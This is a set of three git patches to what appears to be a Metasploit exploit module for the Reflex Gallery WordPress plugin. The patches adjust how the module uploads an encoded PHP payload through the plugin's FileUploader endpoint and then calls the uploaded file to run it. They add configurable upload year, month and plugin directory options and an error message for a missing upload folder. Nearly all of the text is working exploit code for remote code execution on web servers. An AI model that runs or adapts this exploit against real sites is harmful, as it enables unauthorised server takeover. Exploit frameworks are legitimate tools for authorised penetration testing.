From 78710633e2e7018ae67826b3bd8f543ebf33e3d9 Mon Sep 17 00:00:00 2001 From: Kyle Bouchard Date: Wed, 3 Dec 2025 15:46:07 -0500 Subject: [PATCH 1/3] Remove current date constraint from uploaded path --- .../unix/webapp/wp_reflexgallery_file_upload.rb | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 0b04332cbc455..cffac7bb0ce4f 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -55,17 +55,9 @@ def exploit data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"") post_data = data.to_s - time = Time.new - year = time.year.to_s - month = "%02d" % time.month - res = send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'), 'method' => 'POST', - 'vars_get' => { - 'Year' => "#{year}", - 'Month' => "#{month}" - }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) @@ -83,7 +75,7 @@ def exploit print_status("Calling payload...") send_request_cgi( - 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename) ) end end From 7b816cd439dec4d419ee8b45550187558330c7de Mon Sep 17 00:00:00 2001 From: Kyle Bouchard Date: Thu, 4 Dec 2025 11:33:28 -0500 Subject: [PATCH 2/3] Add year and month options for file upload --- .../webapp/wp_reflexgallery_file_upload.rb | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index cffac7bb0ce4f..21bb18581aa19 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -42,6 +42,14 @@ def initialize(info = {}) } ) ) + + time = Time.new + register_options( + [ + OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]), + OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]), + ] + ) end def check @@ -55,9 +63,16 @@ def exploit data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"") post_data = data.to_s + year = datastore['upload_year'] + month = datastore['upload_month'] + res = send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'), 'method' => 'POST', + 'vars_get' => { + 'Year' => "#{year}", + 'Month' => "#{month}" + }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) @@ -66,6 +81,8 @@ def exploit if res.code == 200 && res.body =~ /success|#{php_pagename}/ print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) + elsif res.code == 200 && res.body.include?("does not exist") + fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder") else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") end @@ -75,7 +92,7 @@ def exploit print_status("Calling payload...") send_request_cgi( - 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename) + 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename) ) end end From 30635cbaddc9aa3c97d50d8ef7d7d0461116284d Mon Sep 17 00:00:00 2001 From: ptrstr Date: Wed, 10 Dec 2025 18:14:26 -0500 Subject: [PATCH 3/3] Make plugin URI configurable --- .../unix/webapp/wp_reflexgallery_file_upload.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 21bb18581aa19..388bd1c05cf84 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -48,10 +48,19 @@ def initialize(info = {}) [ OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]), OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]), + OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']), ] ) end + def plugin_dir + datastore['PLUGIN_DIRECTORY_NAME'] + end + + def plugin_uri + normalize_uri(wordpress_url_plugins, plugin_dir) + end + def check check_plugin_version_from_readme('reflex-gallery', '3.1.4') end @@ -67,7 +76,7 @@ def exploit month = datastore['upload_month'] res = send_request_cgi({ - 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'), + 'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'), 'method' => 'POST', 'vars_get' => { 'Year' => "#{year}",